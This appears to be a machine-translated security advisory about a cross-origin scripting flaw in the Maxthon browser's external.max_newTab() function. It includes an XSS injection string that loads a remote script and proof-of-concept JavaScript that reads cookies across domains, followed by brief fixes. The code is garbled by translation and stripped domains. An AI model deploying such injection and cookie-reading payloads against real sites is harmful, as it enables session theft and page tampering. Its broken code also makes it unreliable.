Cross-origin scripting vulnerability in browser

Source: Internet
Author: User

Ao you browser is a multi-tag browser that meets Chinese usage habits. It has the best online favorites and advertisement filtering functions in the industry. Browser explorer has a security defect in architecture design. In addition, it can break through the same-source browser policy in combination with the security issues of its own interface functions, resulting in a cross-origin scripting vulnerability.

A external interface function in the browser does not follow the same-origin policy, and a cross-origin scripting vulnerability exists.

The vulnerability function external. max_newTab () is used to open a new tab. This function has a time competition condition error. It can break through the same-origin policy cross-origin operation window object and execute arbitrary scripts across domains.

At the same time, the external interface function customized by the browser has set a trust domain, which includes * and so on. Combined with a Script Vulnerability of * any web application, you can call the vulnerability function external. max_newTab () performs cross-origin operations.


1. A cross-site scripting vulnerability exists in The cross-site scripting vulnerability can be used to call the vulnerability function and embed a remote js http: // js

Http:// Account = "> <script/src = http: // js> </script>

2. javascript scripts that call vulnerability Functions

hijack_code = "alert(document.cookie);document.write(hacked by"t1 = external.max_newTab("a",,"activate:yes")t2 = external.max_newTab("b",,"activate:yes")t3 = external.max_newTab("a",,"activate:yes")setInterval("t1.eval(hijack_code)",1)setInterval("t2.eval(hijack_code)",2)setInterval("t3.eval(hijack_code)",3)

Hazard results:

The three new tab windows will randomly hit a window and run the cross-domain injection script. For example, Baidu web pages are read by cookies and tampered with webpages.


1. Fixed the WEB application vulnerability in * domain name.

2. Fixed the vulnerability in the interface function external. max_newTab ().

Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.